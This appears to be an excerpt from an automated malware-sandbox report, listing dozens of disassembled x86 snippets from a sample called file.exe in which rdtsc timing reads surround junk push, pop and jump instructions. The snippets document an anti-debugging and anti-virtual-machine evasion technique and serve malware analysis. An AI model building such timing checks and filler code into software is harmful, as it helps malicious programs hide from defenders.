              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B509D9 second address: B509E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FABF0F31B4Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B509E5 second address: B509F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 js 00007FABF0D685F6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B50B1C second address: B50B22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54843 second address: B54872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68606h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FABF0D68605h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54872 second address: B54879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54538 second address: B54542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABF0D685F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54542 second address: B5454C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FABF0F31B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57B45 second address: B57B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57B49 second address: B57B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57B4F second address: B57B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jns 00007FABF0D685F6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FABF0D685F6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57B65 second address: B57B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B53h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57B7C second address: B57B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57E74 second address: B57E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FABF0F31B4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F48D second address: B5F491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F491 second address: B5F49D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F49D second address: B5F4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D685FFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F4B0 second address: B5F4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F762 second address: B5F77B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FABF0D685F6h 0x00000009 jne 00007FABF0D685F6h 0x0000000f popad 0x00000010 pushad 0x00000011 jl 00007FABF0D685F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FE0A second address: B5FE0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60131 second address: B60135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60135 second address: B60147 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABF0F31B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FABF0F31B46h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60147 second address: B60153 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FABF0D685F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B603B3 second address: B603B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60FAF second address: B60FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FABF0D68605h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FABF0D68608h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60FE7 second address: B60FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60FEB second address: B61001 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABF0D685F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FABF0D685FAh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61001 second address: B61008 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6719B second address: B671E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D685FFh 0x00000007 push eax 0x00000008 jmp 00007FABF0D68607h 0x0000000d jnc 00007FABF0D685F6h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FABF0D68607h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B671E9 second address: B67209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0F31B57h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67209 second address: B67219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABF0D685FCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6AFA8 second address: B6AFBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FABF0F31B50h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6AFBF second address: B6B00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FABF0D68606h 0x0000000d jmp 00007FABF0D68607h 0x00000012 jmp 00007FABF0D68605h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A168 second address: B6A172 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FABF0F31B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A43F second address: B6A455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FABF0D685FEh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A455 second address: B6A459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A459 second address: B6A45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A6CB second address: B6A6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABF0F31B57h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A6E8 second address: B6A6EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A9D1 second address: B6A9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A9D5 second address: B6A9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FABF0D68606h 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6AB30 second address: B6AB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B72 second address: B71B8E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FABF0D685FFh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B8E second address: B71B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jnl 00007FABF0F31B46h 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B9D second address: B71BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FABF0D685F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71CFA second address: B71D0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007FABF0F31B46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D0A second address: B71D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D10 second address: B71D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D14 second address: B71D24 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FABF0D685F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D24 second address: B71D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D2A second address: B71D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FABF0D68603h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7203F second address: B72043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72043 second address: B72049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72049 second address: B72059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007FABF0F31B46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72059 second address: B72078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B722F2 second address: B722F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B722F9 second address: B72355 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FABF0D68618h 0x00000008 jmp 00007FABF0D685FBh 0x0000000d jmp 00007FABF0D68607h 0x00000012 push ebx 0x00000013 jmp 00007FABF0D68606h 0x00000018 pop ebx 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ebx 0x0000001c jc 00007FABF0D685FCh 0x00000022 jno 00007FABF0D685F6h 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b ja 00007FABF0D685F6h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7247E second address: B72484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72A5C second address: B72A81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FABF0D68600h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FABF0D685FFh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72A81 second address: B72A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78854 second address: B7885F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jng 00007FABF0D685F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7885F second address: B78868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B78868 second address: B7886C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7886C second address: B78876 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FABF0F31B46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB839E second address: AB83A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B488 second address: B7B48D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B5DE second address: B7B5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FABF0D685F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B730 second address: B7B74F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FABF0F31B54h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B74F second address: B7B755 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B755 second address: B7B75A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B75A second address: B7B78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FABF0D68608h 0x0000000e jmp 00007FABF0D68600h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8E578 second address: B8E57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99550 second address: B9956E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FABF0D685F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FABF0D685FFh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9956E second address: B99579 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99579 second address: B995D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D68608h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FABF0D685FFh 0x00000012 jmp 00007FABF0D685FFh 0x00000017 popad 0x00000018 jmp 00007FABF0D68606h 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FABF0D685F6h 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B995D8 second address: B995DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9D141 second address: B9D16E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABF0D685F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FABF0D68622h 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FABF0D68606h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3193 second address: AB3197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB3197 second address: AB319D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB319D second address: AB31A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB31A3 second address: AB31DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0D68601h 0x00000007 push edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FABF0D68608h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB31DB second address: AB31E6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5C0F second address: BA5C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D685FDh 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FABF0D68606h 0x00000011 jnp 00007FABF0D685F6h 0x00000017 jmp 00007FABF0D685FFh 0x0000001c popad 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FABF0D68605h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5C6D second address: BA5C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5C71 second address: BA5C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46B7 second address: BA46C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0F31B4Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46C9 second address: BA46D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FABF0D685F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46D8 second address: BA46EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46EF second address: BA46F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA46F3 second address: BA46F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA49D2 second address: BA49D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA49D6 second address: BA49E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FABF0F31B46h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA49E4 second address: BA49F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FABF0D685F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4DF1 second address: BA4E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FABF0F31B54h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FABF0F31B4Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4E1C second address: BA4E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4E22 second address: BA4E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8DC2 second address: BA8DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABF0D68609h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8DDF second address: BA8E11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABF0F31B56h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FABF0F31B53h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6465 second address: BB648D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FABF0D685F6h 0x0000000a jmp 00007FABF0D68609h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB648D second address: BB6497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FABF0F31B46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBDBEF second address: BBDBF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF545 second address: BBF555 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABF0F31B46h 0x00000008 jno 00007FABF0F31B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
